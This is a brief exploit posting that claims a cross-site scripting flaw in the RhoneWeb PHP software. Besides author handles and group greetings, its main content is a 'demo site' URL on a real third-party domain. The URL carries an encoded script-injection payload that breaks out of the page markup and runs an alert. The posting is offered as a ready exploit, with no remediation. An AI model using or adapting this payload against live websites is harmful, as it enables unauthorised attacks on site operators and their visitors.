RhoneWeb suffers from a cross site scripting vulnerability.
2dcdf34ab2a59dfddb2ef83b4778520c366df4870660f45f375f04f05d21fea1
# Exploit Title: RhoneWeb Xss Vulnerability
# Date: 11/01/2012
# Author: 3spi0n
# Software Website: http://www.rhone.ch/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Demo Sites:
[~]
http://www.upsa-vs.ch/pdf/Extension%20Avenant%202011.pdf%3C/cite%3E%3Cspanclass=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E[XSS]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Dar bi Koridor Benimki, Kendimi Aradigim.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- Mr.PaPaRoSSe And 3spi0n -
Bug Researcher Group - TURKEY
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>